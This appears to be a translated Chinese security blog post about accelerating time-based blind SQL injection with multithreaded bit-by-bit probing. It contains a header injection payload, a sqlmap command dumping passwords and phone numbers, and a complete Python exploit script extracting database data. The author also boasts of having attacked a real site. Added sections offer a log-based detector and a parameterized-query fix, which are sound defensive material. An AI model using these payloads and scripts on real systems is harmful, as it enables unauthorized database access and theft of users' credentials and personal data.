Binary Breakthrough for Time-Based (Delay) Injection!

admin · 2022-04-09 02:21:24 · Security Articles · 23 views · 6262 characters, about 20 min 52 s to read

Freebuf previously released a video on breaking through time-based injection with binary.
Link: http://open.freebuf.com/inland/574.html



I previously ran into a time-based injection in an HTTP header, and dumping data through it was painfully slow! That site is already done.

```
X-forwarded-for: if(now()=sysdate(),sleep(0),0)/' AND (SELECT * FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT IFNULL(CAST(id AS CHAR),0x20) FROM atoz.members ORDER BY id LIMIT 0,1),5,1))>64,0,5)))))Eibl) AND 'fqFp'='fqFp'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/
```


Time-based injection, and in an HTTP header on top of that, is really not easy to work with; apart from sqlmap I have not seen any tool that is both usable and fast!!
The following is excerpted from the comments.


Looking at this method, the biggest difference from traditional time-based injection is that to obtain one character it can send all the packets at once using multiple threads,
have the program check whether each packet was delayed, assemble the results into a binary value and then convert it into a character. Traditional time-based injection uses bisection (the halving algorithm) and can only fetch a value single-threaded,
because it can only go on to the next check once it has determined which interval the ASCII value falls in; this is where multithreading wins a lot of time. If both methods are considered single-threaded, the difference is actually small.

The calculation is as follows:
Single-threaded
With bisection, determining one character takes about 8 requests on average (common ASCII range 0-127: 64-32-16-8-4-2-1).
Of those 8 requests, the number that need to be delayed averages about 3 to 4; taking the delay as 2 seconds and ignoring the time each request takes,
the traditional algorithm's total time = 4*2s = 8 seconds.
With the binary delay algorithm, a 1 bit generally occurs 2 to 4 times; taking the average, total time = 3*2s = 6 seconds.
The difference is that with the binary delay method the number of delayed requests is smaller, so it is faster.
So single-threaded there is actually no particularly clear advantage; the advantage shows up with multithreading.
There is actually one more algorithm, but it requires a good network where the response time of every request is very consistent; in that case this method has more of an edge.
The ASCII range is 0-127, usually 3 digits; each digit can be extracted and tested. Each digit ranges from 0 to 9, so send with 10 threads at once and only one of them will be delayed:
```sql
select * from news where id=1 and if((substr(ascii('a'),1,1)=1),sleep(2),0)
```
So determining one character's value via its ASCII code takes at most 30 packets; with 10 threads and ignoring send time, 3 delays is about 6 seconds; with 30 threads it takes at most two seconds. If the ASCII code is two digits it is even faster. Which is better, this or the binary delay method, remains to be studied.
Note: none of the above considers Chinese-character values.

```sql
select * from news where id=1 and if((substr(ascii('a'),1,1)=0),sleep(2),0)
select * from news where id=1 and if((substr(ascii('a'),1,1)=1),sleep(2),0)
select * from news where id=1 and if((substr(ascii('a'),1,1)=2),sleep(2),0)
select * from news where id=1 and if((substr(ascii('a'),1,1)=3),sleep(2),0)
select * from news where id=1 and if((substr(ascii('a'),1,1)=4),sleep(2),0)
select * from news where id=1 and if((substr(ascii('a'),1,1)=5),sleep(2),0)
select * from news where id=1 and if((substr(ascii('a'),1,1)=6),sleep(2),0)
select * from news where id=1 and if((substr(ascii('a'),1,1)=7),sleep(2),0)
select * from news where id=1 and if((substr(ascii('a'),1,1)=8),sleep(2),0)
select * from news where id=1 and if((substr(ascii('a'),1,1)=9),sleep(2),0)
select * from news where id=1 and if((substr(ascii('a'),2,1)=0),sleep(2),0)
select * from news where id=1 and if((substr(ascii('a'),2,1)=1),sleep(2),0)
select * from news where id=1 and if((substr(ascii('a'),2,1)=2),sleep(2),0)
select * from news where id=1 and if((substr(ascii('a'),2,1)=3),sleep(2),0)
select * from news where id=1 and if((substr(ascii('a'),2,1)=4),sleep(2),0)
select * from news where id=1 and if((substr(ascii('a'),2,1)=5),sleep(2),0)
select * from news where id=1 and if((substr(ascii('a'),2,1)=6),sleep(2),0)
select * from news where id=1 and if((substr(ascii('a'),2,1)=7),sleep(2),0)
select * from news where id=1 and if((substr(ascii('a'),2,1)=8),sleep(2),0)
select * from news where id=1 and if((substr(ascii('a'),2,1)=9),sleep(2),0)
select * from news where id=1 and if((substr(ascii('a'),3,1)=0),sleep(2),0)
select * from news where id=1 and if((substr(ascii('a'),3,1)=1),sleep(2),0)
select * from news where id=1 and if((substr(ascii('a'),3,1)=2),sleep(2),0)
select * from news where id=1 and if((substr(ascii('a'),3,1)=3),sleep(2),0)
select * from news where id=1 and if((substr(ascii('a'),3,1)=4),sleep(2),0)
select * from news where id=1 and if((substr(ascii('a'),3,1)=5),sleep(2),0)
select * from news where id=1 and if((substr(ascii('a'),3,1)=6),sleep(2),0)
select * from news where id=1 and if((substr(ascii('a'),3,1)=7),sleep(2),0)
select * from news where id=1 and if((substr(ascii('a'),3,1)=8),sleep(2),0)
select * from news where id=1 and if((substr(ascii('a'),3,1)=9),sleep(2),0)
```
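Both techniques in the comment above leave a very recognisable trace on the server side: a burst of near-simultaneous requests from one source, each containing a SQL function that no legitimate parameter value would carry, and a subset of them taking exactly the sleep interval to answer. The following is an added example (not part of the original post or its comments) of the detection logic a defender would run over access logs. The log lines are constructed, the log format and the application paths are assumptions, and the bit-probe regex is tied to the exact `lpad(bin(ord(mid((select user()),...` payload shape used by the demo script later on this page. Besides flagging probes and bursts, it rebuilds from the response times which byte an attacker actually learned, which is what incident response needs to state the scope of a leak.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the original post), format assumed:
#   <timestamp> <client ip> "<request line>" <status> <response seconds>
# The eight requests at 02:21:30 mimic the binary technique: one request per bit of
# the first character of user(); the slow ones (>= 2 s) are the bits that were 1.
SAMPLE_LOG = """\
2022-04-09T02:21:24 203.0.113.10 "GET /demo/1.php?username=root HTTP/1.1" 200 0.02
2022-04-09T02:21:30 203.0.113.10 "GET /demo/1.php?username=root%27+and+if(1%3D(mid(lpad(bin(ord(mid((select+user()),1,1))),8,0),1,1)),sleep(2),0)%23 HTTP/1.1" 200 0.02
2022-04-09T02:21:30 203.0.113.10 "GET /demo/1.php?username=root%27+and+if(1%3D(mid(lpad(bin(ord(mid((select+user()),1,1))),8,0),2,1)),sleep(2),0)%23 HTTP/1.1" 200 2.01
2022-04-09T02:21:30 203.0.113.10 "GET /demo/1.php?username=root%27+and+if(1%3D(mid(lpad(bin(ord(mid((select+user()),1,1))),8,0),3,1)),sleep(2),0)%23 HTTP/1.1" 200 2.02
2022-04-09T02:21:30 203.0.113.10 "GET /demo/1.php?username=root%27+and+if(1%3D(mid(lpad(bin(ord(mid((select+user()),1,1))),8,0),4,1)),sleep(2),0)%23 HTTP/1.1" 200 2.01
2022-04-09T02:21:30 203.0.113.10 "GET /demo/1.php?username=root%27+and+if(1%3D(mid(lpad(bin(ord(mid((select+user()),1,1))),8,0),5,1)),sleep(2),0)%23 HTTP/1.1" 200 0.03
2022-04-09T02:21:30 203.0.113.10 "GET /demo/1.php?username=root%27+and+if(1%3D(mid(lpad(bin(ord(mid((select+user()),1,1))),8,0),6,1)),sleep(2),0)%23 HTTP/1.1" 200 0.02
2022-04-09T02:21:30 203.0.113.10 "GET /demo/1.php?username=root%27+and+if(1%3D(mid(lpad(bin(ord(mid((select+user()),1,1))),8,0),7,1)),sleep(2),0)%23 HTTP/1.1" 200 2.03
2022-04-09T02:21:30 203.0.113.10 "GET /demo/1.php?username=root%27+and+if(1%3D(mid(lpad(bin(ord(mid((select+user()),1,1))),8,0),8,1)),sleep(2),0)%23 HTTP/1.1" 200 0.02
2022-04-09T02:21:31 198.51.100.7 "GET /news.php?id=1+and+if((substr(ascii(%27a%27),1,1)%3D1),sleep(2),0) HTTP/1.1" 200 0.03
2022-04-09T02:21:32 192.0.2.5 "GET /news.php?id=1 HTTP/1.1" 200 0.03
2022-04-09T02:21:33 192.0.2.5 "GET /search.php?q=sleep+apnea HTTP/1.1" 200 0.04
"""

LINE_RE = re.compile(r'^(\S+) (\S+) "([^"]*)" (\d{3}) ([\d.]+)$')

# Fragments that only make sense inside a SQL expression. Requiring the opening
# parenthesis keeps ordinary words such as "sleep apnea" from matching. The last
# two are the signatures of the two parallel techniques described in the comment.
PROBE_PATTERNS = [
    re.compile(r'\bsleep\s*\(', re.I),
    re.compile(r'\bbenchmark\s*\(', re.I),
    re.compile(r'\blpad\s*\(\s*bin\s*\(\s*ord\s*\(', re.I),
    re.compile(r'\bsubstr\s*\(\s*ascii\s*\(', re.I),
]

# Bit probe of the demo script: character position and bit index (1..8).
BIT_PROBE_RE = re.compile(
    r'lpad\(bin\(ord\(mid\(\(select user\(\)\),(\d+),1\)\)\),8,0\),(\d+),1\)', re.I)


def parse_line(line):
    """Split one log line into fields; the request target is URL-decoded."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, ip, request, status, seconds = m.groups()
    method, target, _ = request.split(" ", 2)
    return {"ts": ts, "ip": ip, "method": method, "target": unquote_plus(target),
            "status": int(status), "seconds": float(seconds)}


def matched_patterns(target):
    return [p.pattern for p in PROBE_PATTERNS if p.search(target)]


def analyze(log_text, delay_seconds=2.0, burst_size=4):
    """Return probes (requests carrying injection functions), confirmed probes
    (the server really slept, so the injection works) and per-source bursts
    (burst_size or more probes within one second: the parallel technique)."""
    probes, confirmed = [], []
    per_source_second = defaultdict(int)
    for raw in log_text.splitlines():
        entry = parse_line(raw)
        if entry is None:
            continue
        hits = matched_patterns(entry["target"])
        if not hits:
            continue
        entry["patterns"] = hits
        probes.append(entry)
        if entry["seconds"] >= delay_seconds:
            confirmed.append(entry)
        per_source_second[(entry["ip"], entry["ts"])] += 1
    bursts = sorted(k for k, n in per_source_second.items() if n >= burst_size)
    return {"probes": probes, "confirmed": confirmed, "bursts": bursts}


def recovered_characters(probes, delay_seconds=2.0):
    """Rebuild, per (ip, character position), the byte an attacker obtained:
    bit j is 1 exactly when the j-th probe was slow. Only complete 8-bit sets count."""
    bits = defaultdict(dict)
    for e in probes:
        m = BIT_PROBE_RE.search(e["target"])
        if m:
            pos, bit = int(m.group(1)), int(m.group(2))
            bits[(e["ip"], pos)][bit] = 1 if e["seconds"] >= delay_seconds else 0
    return {key: chr(int("".join(str(b[i]) for i in range(1, 9)), 2))
            for key, b in bits.items() if len(b) == 8}


if __name__ == "__main__":
    report = analyze(SAMPLE_LOG)
    print("probes:", len(report["probes"]), "confirmed:", len(report["confirmed"]))
    print("bursts:", report["bursts"])
    print("leaked:", recovered_characters(report["probes"]))
```

On the constructed log the eight-request burst from 203.0.113.10 is flagged, four of its probes are confirmed by the 2 s response time, and the leaked byte decodes to `r` (the first character of `root@localhost`). The single digit probe from 198.51.100.7 is reported as a probe but not confirmed, which is the distinction between an attempt and a working injection.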

And if it is an HTTP header injection that also needs cookies, that kind of thing! What I did at the time was just sqlmap, renting a few extra VPSes and running it in segments!!

```shell
sqlmap.py -r 1.txt --dbms mysql --batch --dump -C id,pw,phone -T members --thread=5 --start=250 --stop=400 --delay=0.3
```

Below is a binary breakthrough time-based injection demo written by someone else.

--------------------------------------------------------------- Direct script, without cookies or POST requests ----

```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: Lcy
# @Date: 2015-08-29 22:26:17
# @Last Modified by: Sunshie
# @Last Modified time: 2015-08-30 01:48:41
# blog:
# Time-based (delay) injection tool (Python 2)

import urllib2
import time
import socket
import threading
import requests


class my_threading(threading.Thread):
    """One thread per bit: asks whether bit j of character x of user() is 1."""

    def __init__(self, str, x):
        threading.Thread.__init__(self)
        self.str = str   # bit position, 1..8
        self.x = x       # character position, 1-based

    def run(self):
        global res
        x = self.x
        j = self.str
        # bin(ord(char)) is left-padded to 8 bits; if bit j is 1 the server sleeps 2 s
        url = "http://localhost/demo/1.php?username=root'+and+if(1=(mid(lpad(bin(ord(mid((select user())," + str(x) + ",1))),8,0)," + str(j) + ",1)),sleep(2),0)#"
        html = request(url)
        verify = 'timeout'
        if verify not in html:
            res[str(j)] = 0   # answered in time: bit is 0
        else:
            res[str(j)] = 1   # timed out: bit is 1


def request(URL):
    user_agent = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10'}
    req = urllib2.Request(URL, None, user_agent)
    try:
        # 2 s client timeout: a sleep(2) on the server shows up here as a timeout
        request = urllib2.urlopen(req, timeout=2)
    except Exception, e:
        time.sleep(2)
        return 'timeout'
    return request.read()


def curl(url):
    # Alternative timing probe using requests; not used by main()
    try:
        start = time.clock()
        requests.get(url)
        end = time.clock()
        return int(end)
    except requests.RequestException as e:
        print u"访问出错!"
        exit()


def getLength():
    # Probe length 0, 1, 2, ... until the server sleeps; the sleep must be at
    # least as long as the 2 s timeout in request() or it is never detected
    i = 0
    while True:
        print "[+] Checking: %s \r" % i
        url = "http://localhost/demo/1.php?username=root'+and+sleep(if(length((select user()))=" + str(i) + ",2,0))#"
        html = request(url)
        verify = 'timeout'
        if verify in html:
            print u"[+] 数据长度为: %s" % i
            return i
        i = i + 1


def bin2dec(string_num):
    return int(string_num, 2)


def getData(dataLength):
    global res
    data = ""
    for x in range(dataLength):
        x = x + 1
        threads = []
        # eight threads, one per bit, all sent at once
        for j in range(8):
            result = ""
            j = j + 1
            sb = my_threading(j, x)
            sb.setDaemon(True)
            threads.append(sb)
        for t in threads:
            t.start()
        for t in threads:
            t.join()
        # assemble the bits in order and turn them into a character
        tmp = ""
        for i in range(8):
            tmp = tmp + str(res[str(i + 1)])
        res = {}
        result = chr(bin2dec(tmp))
        print result
        data = data + result
        sb = None
    print "[+] ok!"
    print "[+] result:" + data


if __name__ == '__main__':
    stop = False
    res = {}
    length = getLength()
    getData(length)
```
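The demo script above only works because the `username` value is pasted straight into the SQL text, so the `and if(... sleep(2) ...)` tail becomes part of the query. As an added example (not code from the post or from the script's author), here is the same lookup written the vulnerable way next to the fixed version, using the script's own payload as input. The endpoint shape (a lookup by username) is an assumption, since the page does not show `1.php`; the database is an in-memory sqlite3 so it runs offline. In MySQL the concatenated query parses and the server sleeps whenever the probed bit is 1, which is exactly the oracle the script reads; sqlite lacks those functions and the `#` comment, so the concatenated query fails instead. Either way the point is the same: the bound parameter never reaches the SQL parser as code.

```python
import re
import sqlite3

# Payload taken from the demo script above: probes bit 1 of the first character of user().
PAGE_PAYLOAD = "root' and if(1=(mid(lpad(bin(ord(mid((select user()),1,1))),8,0),1,1)),sleep(2),0)#"


def make_db():
    """Constructed sample data (assumption: a users table keyed by username)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
    conn.executemany("INSERT INTO users (username) VALUES (?)", [("root",), ("alice",)])
    return conn


def build_query_unsafe(username):
    # Vulnerable: the caller's text is spliced into the statement, so a quote
    # ends the literal and everything after it is executed as SQL.
    return "SELECT id FROM users WHERE username='" + username + "'"


def lookup_unsafe(conn, username):
    return conn.execute(build_query_unsafe(username)).fetchall()


# Usernames of this hypothetical application: no quotes, spaces or parentheses.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")


def lookup_safe(conn, username):
    # 1) Reject values that cannot be a username before touching the database.
    if not USERNAME_RE.match(username):
        return []
    # 2) Bind the value: the driver passes it as data, the statement text is fixed.
    return conn.execute("SELECT id FROM users WHERE username=?", (username,)).fetchall()


def demo(username):
    """Run both lookups on one input and report what each one did."""
    conn = make_db()
    out = {"unsafe_sql": build_query_unsafe(username),
           "safe_rows": lookup_safe(conn, username)}
    try:
        out["unsafe_rows"] = lookup_unsafe(conn, username)
        out["unsafe_error"] = None
    except sqlite3.Error as e:
        # sqlite cannot run the injected functions; MySQL would run them and sleep
        out["unsafe_rows"] = None
        out["unsafe_error"] = type(e).__name__
    return out


if __name__ == "__main__":
    for value in ("root", PAGE_PAYLOAD):
        r = demo(value)
        print("input:", value)
        print("  concatenated SQL:", r["unsafe_sql"])
        print("  unsafe rows:", r["unsafe_rows"], "error:", r["unsafe_error"])
        print("  safe rows:", r["safe_rows"])
```

For the legitimate input `root` both versions return the same row; for the script's payload the concatenated statement contains `sleep(2)` as live SQL, while the validated and bound version simply finds no such user. The allowlist check is defence in depth: binding alone already stops the injection, but rejecting impossible values early also makes the probes visible as validation failures in the application log.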

-------------------------------------------------


Sending a request with a cookie using urllib2 in Python; the concrete method is as follows:

```python
import urllib2
opener = urllib2.build_opener()
opener.addheaders.append(('Cookie', 'cookiename=cookievalue'))
f = opener.open(url)   # url: the target URL (the argument is missing from the original post)
```

```python
#!/usr/bin/python
#coding=utf-8
import urllib
import urllib2


def post(url, data):
    req = urllib2.Request(url)
    data = urllib.urlencode(data)
    # enable cookie handling so the session cookie set by the login is kept
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())
    response = opener.open(req, data)
    return response.read()


def main():
    posturl = "http://www.xiami.com/member/login"
    data = {'email': 'myemail', 'password': 'mypass', 'autologin': '1', 'submit': '登 录', 'type': ''}
    print post(posturl, data)


if __name__ == '__main__':
    main()
```


From: https://forum.90sec.org/forum.php?mod=viewthread&tid=8923


Originally published by the WeChat public account moonsec: Binary Breakthrough for Time-Based (Delay) Injection!

Article link (CN-SEC): http://cn-sec.com/archives/565596.html